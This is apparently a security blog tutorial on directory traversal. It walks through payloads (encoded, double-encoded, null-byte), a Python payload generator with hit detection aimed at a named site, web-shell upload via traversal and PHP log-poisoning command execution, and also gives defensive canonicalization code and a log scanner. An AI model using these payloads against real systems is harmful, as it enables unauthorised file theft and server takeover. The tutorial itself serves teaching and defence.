
Hey guys, Rocky here! 🚪🔓
Welcome to Day 9 of the Daily Web Hacking series! So far, we’ve tackled authentication bypasses, file upload vulns, and XSS. Today, we’re diving into Part 9: Directory Traversal, the bug that lets you “escape” a website’s public folder and rummage through whatever else the web server process can read. Imagine breaking out of a prison cell only to find the warden’s secret file cabinet. Let’s get into it!
—
What is Directory Traversal?
Directory Traversal (aka Path Traversal) is a vulnerability that allows attackers to read, and sometimes write or include, files outside the web root directory (the folder where the website’s public files live). By manipulating file paths (e.g., inserting ../../ sequences), hackers can:
- Steal sensitive files (/etc/passwd, .env, backups).
- Access source code or configuration files.
- Plant malware or overwrite critical files, when the vulnerable code writes to the path instead of reading it.
Why it’s dangerous: the web server opens the file on the attacker’s behalf, so everything its user account can read becomes reachable through a single request parameter.
—
How Directory Traversal Works
Web apps often use user-supplied input to load files (e.g., profile pictures, PDFs). If the app joins that input onto a directory without canonicalizing and checking the result, attackers can inject path sequences like ../ to “escape” the web root.
Example:
A site loads user avatars via:
https://site.com/load?file=rocky.jpg
An attacker changes file=rocky.jpg to:
file=../../../../etc/passwd
Result: each ../ steps one directory up from the avatar folder (extra ones past / are harmless), the path resolves to /etc/passwd, and the server returns it, exposing the system’s user list!
—
Types of Directory Traversal
1. Basic Traversal
- Plain ../ sequences (or ..\ on Windows), e.g. ../../../../etc/passwd.
2. Encoded Traversal
- Bypass filters with URL encoding, double encoding, or Unicode.
- Payloads:
- URL-encoded: ..%2F..%2Fetc%2Fpasswd
- Double-encoded: ..%252F..%252Fetc%252Fpasswd (only helps when the app decodes the parameter a second time after its filter has run)
3. Null Byte Injection
- Append %00 so that an extension the app adds (like .jpg) is cut off: ../../etc/passwd%00.jpg. Only old runtimes are affected; PHP has rejected null bytes in file paths since 5.3.4.
4. Absolute Path Abuse
- Supply a full path such as /etc/passwd; path-join functions typically discard the base directory when the second argument is absolute, so no ../ is needed.
—
Real-World Directory Traversal Disasters
- Apache httpd (2021): CVE-2021-41773, and CVE-2021-42013 after an incomplete fix, let attackers use encoded ../ sequences to reach files outside configured document roots in httpd 2.4.49 and 2.4.50, and to run code where CGI was enabled.
- WordPress (2017): a plugin flaw let unauthenticated users fetch wp-config.php, which holds the database credentials.
- Tesla (2018): misconfigured servers leaked vehicle telemetry, a configuration failure rather than a traversal bug, but the same lesson about unprotected files applies.
Lesson: Even tech giants mess up.
—
Step-by-Step Exploitation
Goal: Steal the /etc/passwd file from a vulnerable photo-sharing site.
1. Find a Vulnerable Endpoint
Look for parameters that name a file, like ?file=, ?page=, or ?load=.
Example URL:
https://hacklivly.com/view?image=profile.jpg
2. Test Basic Traversal
Replace the filename with a traversal payload and send it raw (no client-side URL encoding):
image=../../../../etc/passwd
A hit comes back as colon-separated lines starting with root:x:0:0; a 403, a generic error, or the default image means a filter or a fixed base directory is in the way.
3. Bypass Filters
If blocked, try encoding:
image=..%2F..%2Fetc%2Fpasswd
or double encoding (..%252F..%252F) for apps that decode twice, or add a null byte to cut off an appended extension:
image=../../etc/passwd%00.jpg
(the null-byte trick only works on old runtimes such as PHP before 5.3.4).
4. Escalate Access
- Steal config files: .env, config.php, wp-config.php.
- Execute code: if the app also writes files to a user-controlled path, drop a web shell (see the next section).
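To make steps 2 and 3 concrete, here is an added Python example (not from the original post) that builds the payload variants from the “Types” section for a target path and triages a response body by looking for the tell-tale /etc/passwd layout. The endpoint and parameter name are the ones from the example URL above, and the three response bodies are constructed for the example; when you send the payloads for real, use a client that does not re-encode the query string (Burp Repeater, for instance).

```python
import re
from urllib.parse import quote

# Added example for the walkthrough above; endpoint and parameter are assumed
TARGET_URL = "https://hacklivly.com/view"
PARAM = "image"


def traversal_variants(target: str = "etc/passwd", depth: int = 4) -> dict:
    """Build the payload variants from the 'Types' section for one target path.

    depth: number of ../ hops. More than needed is harmless because '..' at '/'
    stays at '/', so four or five is a good default against unknown layouts.
    """
    plain = "../" * depth + target
    # quote(safe="") turns '/' into %2F and leaves '.' alone
    url_encoded = quote(plain, safe="")
    # encoding the result again turns each '%' into %25 -> %252F; this only
    # helps when the app decodes the parameter a second time after its filter
    double_encoded = quote(url_encoded, safe="")
    return {
        "plain": plain,
        "backslash": plain.replace("/", "\\"),           # Windows separators
        "url_encoded": url_encoded,
        "double_encoded": double_encoded,
        "dot_encoded": "%2e%2e/" * depth + target,       # dots encoded, slashes not
        "null_byte": plain + "%00.jpg",                  # old PHP (< 5.3.4) only
        # survives a filter that removes '../' in a single, non-recursive pass
        "strip_resistant": "....//" * depth + target,
    }


def payload_urls(target: str = "etc/passwd", depth: int = 4) -> dict:
    """Map variant name -> full URL, with the payload inserted verbatim."""
    return {name: f"{TARGET_URL}?{PARAM}={p}"
            for name, p in traversal_variants(target, depth).items()}


# /etc/passwd lines have 7 colon-separated fields with a numeric uid and gid
PASSWD_LINE = re.compile(
    r"^[A-Za-z_][\w.-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.MULTILINE
)


def looks_like_passwd(body: str) -> bool:
    """True when the body contains a root entry and at least one well-formed passwd line."""
    return "root:" in body and PASSWD_LINE.search(body) is not None


def classify_response(status: int, body: str) -> str:
    """Rough triage of one probe: 'hit', 'blocked' or 'miss'."""
    if looks_like_passwd(body):
        return "hit"
    if status in (400, 403):
        return "blocked"   # a filter or WAF saw the payload: try the encoded variants
    return "miss"          # 404 or default content: wrong depth, fixed base dir, or not vulnerable


# Constructed sample responses (not captured from any real site)
SAMPLE_HIT = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
SAMPLE_BLOCKED = "<html><body>Forbidden</body></html>"
SAMPLE_MISS = "<html><body>File not found</body></html>"

if __name__ == "__main__":
    for name, url in payload_urls().items():
        print(f"{name:16} {url}")
    print(classify_response(200, SAMPLE_HIT),
          classify_response(403, SAMPLE_BLOCKED),
          classify_response(404, SAMPLE_MISS))
```

Work through the variants in order: a “blocked” on the plain payload followed by a “hit” on the double-encoded one tells you the app decodes the parameter after its filter ran, which is worth stating in the report.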
—
Advanced Traversal Tactics
1. Writing Files
How: the app builds the destination of an upload or edit from a user-controlled filename, and the web server user is allowed to write inside the document root.
Payload (as the filename):
../../var/www/html/shell.php
Impact: execute commands via https://site.com/shell.php.
2. Log Poisoning
This needs a file inclusion flaw (the traversed path ends up in include/require), not just a file read, because the log has to be parsed as PHP. Inject PHP into a field the server logs verbatim; the request line works if your client sends it unencoded, and the User-Agent header is the usual alternative:
GET /<?php system($_GET['cmd']); ?>
Then include the log and pass the command:
https://site.com/view?file=../../var/log/apache2/access.log&cmd=id
3. PHP Wrappers
Use php://filter to read a file Base64-encoded instead of having PHP execute it (works when the path reaches include/require or a file function with wrappers enabled):
file=php://filter/convert.base64-encode/resource=../../etc/passwd
Decode the Base64 output to get the file. This is the way to read PHP source such as config.php, which a plain include would run rather than display.
—
Tools for Directory Traversal
1. Burp Suite
- Repeater: Test payloads manually.
- Intruder: Brute-force common paths (
/etc/passwd
, .env
).
2. DotDotPwn
- A traversal-specific fuzzer that generates depth and encoding variants of ../ automatically.
3. FFUF (Fuzz Faster U Fool)
- Fuzz the file parameter with a traversal wordlist and filter on response size or match on a string like root:x: to spot hits.
—
Defending Against Directory Traversal
For Developers
Input Validation
Rejecting ../, ..\, and absolute paths is a start, but blocklists miss encoded and doubled forms (..%2F, ....//). The reliable check is to build the path, canonicalize it, and confirm the result still sits inside the intended directory.
PHP Example:
$file = basename($_GET['file']); // Strips path info: ../../etc/passwd becomes passwd
basename() is enough when every servable file lives flat in one directory; join the result onto that fixed directory rather than using it as-is.
Whitelist Allowed Files
Use a mapping of allowed filenames:
allowed_files = {"profile.jpg": "images/profile.jpg"}
file = allowed_files.get(request.args.get('file'), "default.jpg")
Use Platform-Safe Functions
Canonicalize with realpath() in PHP or os.path.realpath in Python before checking, and compare the result to the base directory as a path rather than as a string prefix, so that /var/www/uploads2 is not mistaken for a child of /var/www/uploads.
Store Files Outside Web Root
Keep uploads and data files outside the document root and serve them through a handler that performs the check above, so even a file written via traversal (like shell.php above) is never reachable by URL.
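Here is an added Python example (not from the original post) that puts the vulnerable join from “How Directory Traversal Works” beside the canonicalize-and-check version described above. The upload directory /var/www/app/uploads is assumed, and nothing is read from disk, so the path checks run as-is.

```python
import os
from pathlib import Path

# Assumed upload directory for this example (hypothetical; nothing is read from disk)
BASE_DIR = Path("/var/www/app/uploads")


def vulnerable_path(user_file: str) -> str:
    """The bug: the request parameter is joined straight onto the base directory.
    '../' walks out of it, and os.path.join drops BASE_DIR entirely when
    user_file is an absolute path."""
    return os.path.join(str(BASE_DIR), user_file)


def naive_filter_path(user_file: str) -> str:
    """A blocklist 'fix' that is still bypassable: one non-recursive pass of
    stripping '../' turns '....//' into '../'."""
    return os.path.join(str(BASE_DIR), user_file.replace("../", ""))


def resolves_to(path: str) -> str:
    """Where the OS would actually open the path ('..' and symlinks resolved)."""
    return os.path.realpath(path)


def safe_path(user_file: str) -> Path:
    """Canonicalize first, then require the result to sit inside BASE_DIR.

    Do this after every decoding step the app performs on the parameter, and
    compare as paths (parent relationship), not as a string prefix, otherwise
    /var/www/app/uploads2/x would pass a check for /var/www/app/uploads.
    Raises ValueError on any escape attempt.
    """
    if "\x00" in user_file:
        raise ValueError("null byte in filename")
    base = BASE_DIR.resolve()
    # Path.resolve() collapses '..' and follows symlinks; non-strict, so a file
    # that does not exist yet is still handled
    candidate = (BASE_DIR / user_file).resolve()
    if candidate == base or base not in candidate.parents:
        raise ValueError(f"path escapes upload directory: {user_file!r}")
    return candidate


def is_rejected(user_file: str) -> bool:
    """True if safe_path() refuses the name."""
    try:
        safe_path(user_file)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in ["profile.jpg", "../../../../etc/passwd", "/etc/passwd",
                 "....//....//....//....//etc/passwd", "../uploads2/x"]:
        verdict = "REJECTED" if is_rejected(name) else safe_path(name)
        print(f"{name!r:40} vulnerable -> {resolves_to(vulnerable_path(name))}  safe -> {verdict}")
```

Note that safe_path() does not reject the ....// payload; it does not need to, because after canonicalization that name is just a harmless (nonexistent) subdirectory inside the upload folder. Containment after canonicalization is the property you want, not the absence of particular characters.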
For Admins
File Permissions
Run the web server as a low-privilege user that cannot read other applications’ configs or write into the document root; a traversal then exposes only what that user can open.
Web Application Firewall (WAF)
Block plain and encoded ../ patterns at the edge as a speed bump, not as the fix; the encoding tricks above exist precisely to get past this layer.
Log Monitoring
Alert on ../, ..%2F, %2e%2e, and %00 in request paths, and treat a 200 response to such a request as a confirmed read until proven otherwise.
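As an added example for log monitoring (not from the original post), the following Python scans Apache-style access log lines for traversal attempts, decoding the request target repeatedly so double-encoded payloads are caught, and marks which attempts got a 2xx back. The five log lines are constructed for the example, not real traffic.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format; not real traffic
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:10:01:02 +0000] "GET /view?image=profile.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:01:09 +0000] "GET /view?image=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:10:01:15 +0000] "GET /view?image=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 403 199 "-" "curl/8.0"
203.0.113.5 - - [10/May/2024:10:01:21 +0000] "GET /view?image=%2e%2e/%2e%2e/etc/passwd%00.jpg HTTP/1.1" 200 1843 "-" "curl/8.0"
198.51.100.7 - - [10/May/2024:10:02:00 +0000] "GET /docs/v2.1/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(raw: str, max_rounds: int = 3):
    """URL-decode until the string stops changing.

    Returns (decoded, rounds_that_changed); 2 or more means the client sent a
    double-encoded payload, which is itself a strong signal of evasion.
    """
    cur, rounds = raw, 0
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur, rounds


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it shows no traversal indicator."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded, rounds = decode_fully(m["target"])
    traversal = "../" in decoded or "..\\" in decoded
    null_byte = "\x00" in decoded
    if not (traversal or null_byte):
        return None
    status = int(m["status"])
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "target": m["target"],
        "decoded": decoded.replace("\x00", "\\x00"),
        "status": status,
        "double_encoded": rounds >= 2,
        "null_byte": null_byte,
        # a 2xx answer to a traversal payload deserves an incident, not just an alert
        "likely_success": 200 <= status < 300,
    }


def scan_log(text: str) -> list:
    """All findings for a block of log text, in file order."""
    return [f for f in (inspect_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flags = [k for k in ("double_encoded", "null_byte", "likely_success") if f[k]]
        print(f"{f['time']} {f['ip']} {f['status']} {f['decoded']} {' '.join(flags)}")
```

The decode loop is the part most detection rules get wrong: matching on the raw string catches the plain payload only, while decoding exactly once still misses ..%252F. Decoding until stable, with a small cap, handles both without turning the scanner into a denial-of-service target.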
—
Practice Legally: Labs & Challenges
- DVWA (Damn Vulnerable Web App):
- Practice traversal in the File Inclusion module.
- PortSwigger Labs (Web Security Academy):
- Free path traversal labs, from the simple case through encoding, non-recursive stripping, and null-byte filter bypasses.
- Hack The Box:
- Machines like Traverxec focus on path traversal.
—
Ethical Hacking & Reporting
Never exploit traversal vulns without permission. If you find one:
- Document: Record steps to reproduce.
- Report: Use the site’s security contact or bug bounty program.
- Disclose: Wait for a fix before sharing publicly.
—
Final Thoughts
Directory traversal is the digital equivalent of picking a lock. It’s simple, silent, and shockingly effective. By validating inputs, hardening servers, and thinking like a hacker, you can slam the door on this attack.
Remember: The web’s security depends on you. Find flaws, fix them, and keep the internet safe—one ../ at a time.
Rocky out! ✌️
—
P.S. If you’re loving this series, share it with your crew! Let’s turn script kiddies into security guardians.
Discussion Question: What’s the wildest file you’ve accessed via traversal? I once found a database backup chilling in /var/backups. 😅 Spill your stories below! 👇